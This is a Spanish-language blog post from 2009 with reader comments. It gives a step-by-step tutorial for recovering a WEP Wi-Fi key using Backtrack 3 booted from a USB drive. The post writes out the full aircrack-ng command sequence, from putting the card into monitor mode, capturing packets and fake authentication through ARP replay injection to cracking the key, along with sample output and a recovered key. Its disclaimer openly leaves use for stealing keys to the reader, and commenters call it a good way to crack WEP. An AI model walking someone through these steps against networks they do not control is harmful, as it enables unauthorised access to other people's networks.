sábado, 14 de febrero de 2009

Guia tutorial paso a paso para conocer clave WEP desde Windows XP o Vista corriendo Backtrack3 desde un Pendrive sin borra NADA! usando aircrack


Requisitos! SOLO un pendrive con minimo 1gb

NOTA ACLARATORIA:
-La presente guia tutorial busca demostrar la vulnerabilidad del sistema WEP mediante una auditoria

-Fue llevada a cabo tras un problema donde perdi la clave y no tenia acceso al maldito router

-Si lo usas para robar clave, lo dejo bajo tu responsabilidad.
-El Chip de tu antena de WIFI debe ser compatible
Tutorial> ventajas> no requiere borrar tu sistema windows xp vista para utilizar el aircrack
, bactrack, y todos los ack XD

1.- Deberas descargar una imagen ISO de la distribucion de Linux Backtrack 3 a tu sistema operativo Windows Vista o XP
desde aqui:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

2.-Instala la distribucion de Backtrack en un Pendrive con minimo 1gb de memoria, recuerda respaldar tu informacion.
Sigue los pasos del siguiente link, cuando lo hayas realizado regresa a esta pagina.
http://stopmonopolio.blogspot.com/2009/02/tutorial-de-unetbootin-para-instalacion.html


3.- Cuando reinicies tu PC deberas elegir una de las opciones para correr el Backtrack 3
Para esto deberas ir probando cual te funciona
-BT3 graphics mode KDE

-BT3 graphics mode FLUX
-BT3 graphics mode VESA KDE . . .
(El mode VESA KDE fue el que me funciono :D porque es más universal
)
¿Por que es más Universal?
4.- Verás como aparecen miles de letras (Tranquilo papa!) ..y es que el sistema esta cargando, pero calma que como lo estamos corriendo desde un pendrive, no te esta borrando nada de tu disco duro( ni de tu windows :P).

5.-Una vez que termine de cargar el sistema, veras como se inicia Backtrack con su dragon en el fondo de tu pantalla, invitando a que el buen Karma llegue a tu PC y toda su buena onda.


Verás esto como fondo de pantalla




6.- Te sientes Cool? Tranquilo que ahora empieza lo bueno!!
Abre un Terminal "Shell console" (la pantallita negra que esta al lado del icono azul, que en windows seria Inicio) ", con el logo de Back I track 3 bt ~ # (aqui tendras que escribir de ahora en adelante) .
a.-


7.- escribe: airmon-ng start wifi0 te saldra un listado..










8.- Luego del listado escribe

airodump-ng ath1 o el athX que diga Monitor mode enable, ojo le llaman athX por el nombre del chipset Atheros. (Solo si deseas info adicional, escribe en la terminal iwconfig.)
















Ojo Aquí, para que esto funcione en tu red, debe existir tráfico de datos, es decir la columna #Data no debe estar en cero. En este caso dice 71

matrix NO, Backtracking!!!!!!!!!!!!!
Ahora saldrá un listado de las conexiones que detecta tu atena de WIFI cuando la encuentres, para que la lista se detenga (en caso de que existan miles de conecciones) con "Control C" se detienen la busqueda.

9.- Fijate en las que digan WEP, y fijate (en mi caso, en el nombre de la red al cual me conecto) que llamaremos Stop Monopolio. (si...marketing barato XD y censura para los vecinos)
Fijate tambien en la Columna que esta bajo el nombre de CH (esto es CHannel) que es el canal en el cual tu router esta transmitiendo la señal.
luego en una nueva terminal, escribe.

airodump-ng -c [canal] --bssid [AP MAC] -w [filename] ath1

[canal de transmision] es el canal CH
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX

[filename] el nombre de archivo que le quieres dar, que será "stop", acuerdate del nombre!
¡MI NO ENTENDER? aun?

en este caso seria:
airodump-ng -c 6 --bssid 00:21:27:E6:6C:64 -w stop ath1
luego verás algo como esto:








10.-Abre una nueva terminal(no cierres la anterior) y escribe:

aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

donde: [AP SSID] es el nombre de la red en este caso era Stop Monopolio, pero ojo! cuando son nombres formados por 2 palabras en este caso Stop Monopolio, debes escribirlo entre comillas "Stop Monopolio", si hubiese sido solo StopMonopolio, lo dejas tal cual (StopMonopolio respetando las mayusculas)

Luego te deberia salir algo asi
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful CARITA FELIZ
Si te sale eso, es que estas listo ;)












11.-luego en la misma terminal escribe lo siguiente:

aireplay-ng -3 -b [AP MAC] ath1 -x 250
Ahora espera un rato, el primer número comienza a aumentar, espera a lo menos que llegue a 40.000 o más. Luego de esto, abre otra terminal













Luego de unos segundo Fijate en Read xxxxx packets














12.- Ahora, abre una nueva terminal y escribe lo siguente
:
aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en mi caso sería
stop*.cap o el nombre que se te haya ocurrido, espera un rato (si!!!! nuevamente esperar, segun el tipo de procesador que tengas)....

aircrack-ng -z -b 00:21:27:E6:6C:64 stop*.cap



OJO: Si el sistema te falla, y te pide mas IVs, deja correr el comando anterior para capturar más tiempo hasta un número superior de Read 70000 packets o más!!






Luego de esto!!!!!!!!!!!!








key Found: 01:25:85:51:64
:D




Te aparecerá la clave :D ...
si son numeros, escribelo en un papel, y ahora tienes dos posibilidades, reiniciar el PC sin el Backtrack y probar la clave en windows escribiendo estos números (sin los dos puntos o con los dos puntos, ahi tienes que probar) o bien, probarla de inmediato en el backtrack (PASO LóGICO).

PASO LOGICO
13.- Probando inmediatamente la clave en el backtrack

Haz click en el icono de "inicio de Backtrack" (a la izquierda de la barra de tarea) y luego entra a Internet, ahi saldrá nuevamente un menu.
Bueno Ahi hace click en Wireless Assistant.
Una vez dentro de Wireless Assistant, hace doble click en tu red y configurala!
En este caso Stop Monopolio !














Cuando te pregunta por cual tipo, Elige Shared Key y luego escibre los numero
xx:xx:xx:xx:xx








































automatic al menos que seas PRO




















Elige Shared Key y no actives ASCII, ya que ASCII es cuando conoces la palabra que usas como clave de tu insegura red WEP
, como recien sacaste los numero, deberias escribir los numeros de la red Stop Monopolio
01:25:85:51:64














Si algo hiciste mal (mal escrita la clave, o no era shared key, etc etc)
Haz click con el boton derecho y elige forget setting (obvio, no?) y reconfigurala nuevamente















Si funcionó el asunto! deberia salir successfully connected to...
¡si no entiendes que es successfully connected, hazte un curso de ingles urgente!
. ESO!
pd: estos números tambien sirven cuando te pide la clave en windows, recuerda aquello de sacar los dos puntos entre los números! si no anda!
Conclusion: -Las claves WEP son una mierda, cambiala ahora YA!
Si vas a mejorar o vilmente copy-pastear este manual, RECUERDA citar a
http://stopmonopolio.blogspot.com de lo contrario te morirás de sarna XD

19 comentarios:

Anónimo dijo...

Un punto clave en la actual guia, es que la red frente a la cual deseamos descifrar su clave debe tener trafico de informacion. Es decir si el router esta encendido y no existe trafico alguno. La cosa no funcionará.
Lo anterior, se debe a que cada paquete o packets de informacion que viaja en el aire contiene cifrada la contraseña.

Anónimo dijo...

buena forma de crackear el wep

Anónimo dijo...

hola que tal de verdad quisiera que me colaboraran con lo siguiente:
como hago para hacer correr el backtrack 3 en mi pc..
tengo un hp dv2000 con windows xp... y he tratado de mil maneras pero nada...lo que pasa es lo siguiente:
bajo la imagen iso para pendrive copio las carpetas boot y bat en mi usb y pongo a bootear desde usb... reinicio y todo va bien.. entra por usb y empieza a cargar ....pero en cuestion de unos 5 segundos la pantalla queda en negro ... al principio pense que era normal pero espere hasta 50 minutos haber si es que el programa se demoraba cargando tanto pero no no mostraba nada solo la pantalla en negro...pulse todas las teclas y con ninguna ofrecia ninguna respuesta asi que fui a apagarlo a las malas para volver a iniciar y cualdo pulse el boton de apagado manual( a las malas) me mostro una imagen de backtrack 3 como si continuara cargando y se quedo congelada al instante... la verdad es que no se que pasa...si es que cargando el bactrack 3 se demora mas de 1 hora o que , o si es que algo me quedo mal hecho o si es que backtrack 3 no me funciona en windows xp, o si es que mi computador portatil no sirve para cargar el backtrack 3.... les agradeceria mucho sus respuestas... a los qe ya lo han usado con windows xp y saben que cosas puede haber hecho mal o como me pueden orientar para hacer correr en mi equipo.....les agradeceria mucho sus respuestas de verdad no saben cuanto

Anónimo dijo...

Una pregunta
/cuando bajas la Imagen *iso de la distribucion de Backtrack3 utilizas Unetbootin y un Pendrive para arrancar esta distro desde ahi, y lo otro en el unetbootin debes elegir la opcion grafica Universal VESA.

pd> si lo he cargado temporalmente en la ram, teniendo el windows XP en el disco duro.

Anónimo dijo...

hola queria consultarles algo....
lo que pasa es que quiero utilizar el backtrack 3 y tengo windows xp, mi laptop es un HP dv 2000, AMD Turio 64x2, broadcom 802/11g, RAM de 2g, disco duro de 250g.. en fin...el problema que tengo es que no he podido usar el backtrack 3 he seguido los pasos que me indican y creo que estan bien...claro que no estoy completamente segurisimo.... cuando arranca a bootear por modo usb lo dej que inicie normalmente y aparace dos letreos que dicen botting charging o algo asi y depronto la pantalla queda negro... no se apaga.. solo queda en negro y nada he esperado hasta 30 minutos y nada.. no pasa nada...no me muestra las mil letras que pasan como cuando uno carga una pc en modo seguro...la pantalla esta en negro y al momento de apagarlo de forma forzosa con el boton de apagado manual de la laptop me sale una pantalla de backtrack 3 con unas cosas como si estubiera carando pero se congela, queda quieto...y en la parte de bajo aparece un letrero entre comillas que dice " the quiete you become, the nmore you are able to hear" y para poder apagarlo me toca mantener pulsado el boton de apagado manual como 5 segundos..... de todas maneras quisiera que me colaboraran que me dijeran si es que mi laptop no sirve para cargar el backtrack 3, que he hecho algo mal durante el preoceso... o si es que no pasa nada que la pantalla se ponga negra y se demora mas tiempo cargando y tengo que esperar mas tiempo la verdad no se...ustedes son los que saben y de verdad que les agradeceria muchisimo sus respuestas... llevo semanas intentanto y nada.. por favor colaborenme... muchas gracias...ANDRES VL

Anónimo dijo...

No creo que el problema sea tu ordenador. Yo creo que es mas bien un problema de la opcion que eliges al cargar el Backtrack.

Eliges en el paso 3 de la guia MODE VESA KDE?
Has Probado cargando otras distribuciones de Linux con UNETBOOTIN?

Anónimo dijo...

gracias por su respuesta... lo que pasa es lo siguiente .....descargue el ubuntu 8.10 64 bits y cuando dentro al unebootin en distribucion pongo ubuntu y en frente busco donde dice 8.10 live x64 no se si es asi o en realidad que debo hacer con esa imagen iso de ubuntu que descargue porque abajo donde dice imagen iso busco la imagen de bactrack 3 que descargue y la pongo ahi diganme si eso esta bien o que debo hacer.

Anónimo dijo...

como se realiza el paso 10

Anónimo dijo...

hola he intentado hacelo pero el paso 10 no lo consigo hacer, lo e hecho como dice

Anónimo dijo...

¿Que pasa que no podés hacer el paso 10?
Que mensaje te arroja

Anónimo dijo...

hola, amí no me deja accesar al sistema, traté todos los modos y unicamente en --modo seguro--- (bt3 safe mode) me muestra la siguiente info:
-initializing CPU#1
-Calibrating delay using timer specific routine.. 3591.41 BogoMIPS (lpj=7182837)
-CPU: L1 I Cache:64k (654 bytes/line), D Cache 64 K (64 Bytes/line)
-CPU L2 Cache: 256k (64 bytes/line)
-CPU 1(2) -> Core 1
-Intel Machine check architecture supported.
-Intel machine check reporting enabled on cpu#1.
-CPU: AMD (Athlon(tm) 64x2 Dual-Core Processor TK-55 stepping 01
-Total of 2 Processors activated (7257.22 BogoMIPS).
- ENABLING IO-APIC IRQS
...Timer: vector 0x31 apic1=0 pin1=0 apic2=-1 pin2=-1
...MP-BIOS bug: 8254 timer not connected to IO-APIC
...Trying to set up timer (IRQ0) through the 8259A ... failed.
...Trying to set up timer as Virtual Wire IRQ... works.
-Brought up to CPUs.
-migration_cost=0
NET:Registered protocol family 16.
-no dock devices found.
-ACPI: bus type pci registered.
-PCI:Using MMCONFIG.
-PCI: NO MMCONGFIG possible on devide 00:18-
Setting up standard PCI Resources.
- ACPI: Intepreter enabled.
ACPI:Using IOAPIC for interrup routing....


(y aquí es donde se me congela la pantalla y no avanza...)
hice mal algun paso para generar el ISO o acaso mi dispositivo no permite accesar al programa?


gracias por su apoyo....

David AG.

Anónimo dijo...

Ostiaaaa
oye David, tenia el mismo problema, y la solucion fue crear una particion e instalar el bt3.

ManoloWeb

Anónimo dijo...

Que PC usas, me refiero al hardware?
es un notebook?
marca?

L.D.4

Anónimo dijo...

Hola, Soy David, es una Lap top Toshiba Satellite con Win vista Home premium...

Al particicionar no se pierde informacion cuando se corre?

no puedo cargar un cd live con unbuntu y cargarlo desde ahí? el unbuntu si lo puedo cargar...


Gracias por su apoyo!!!


David AG.

Anónimo dijo...

Recuerda que al particionar, y tener windows y linux. En windows debes previamente desfragmentar el disco, de lo contrario tendrias problemas graves

Respecto a tu problema, revisa si al crear el pendrive booteable haces sigues bien los pasos.

TartiHawk

Anónimo dijo...

exelente tutorial,en lo personal me gusto el toke de sarcasmo usado todo funciona ya lo he probado sigu asi

Anónimo dijo...

hola que tal, estoy haciendo todo el proceso, estoy introduciendo el comando para identificar redes disponibles (airodump-ng ath1) el problema es que no detecta nada, a pesar de que en otra computadora detecto redes inhalambricas con buena señal. que puede ser?

Anónimo dijo...

que dice tu perfil de airmon-ng start wifi0 ?

Anónimo dijo...

se puede instalar bt3 desde un disco o cd
ya que no cuento con una memoria usb me refiero asi como el windows aqua que sirve para reparar errores y es un archivo de imagen temporal

Publicar un comentario en la entrada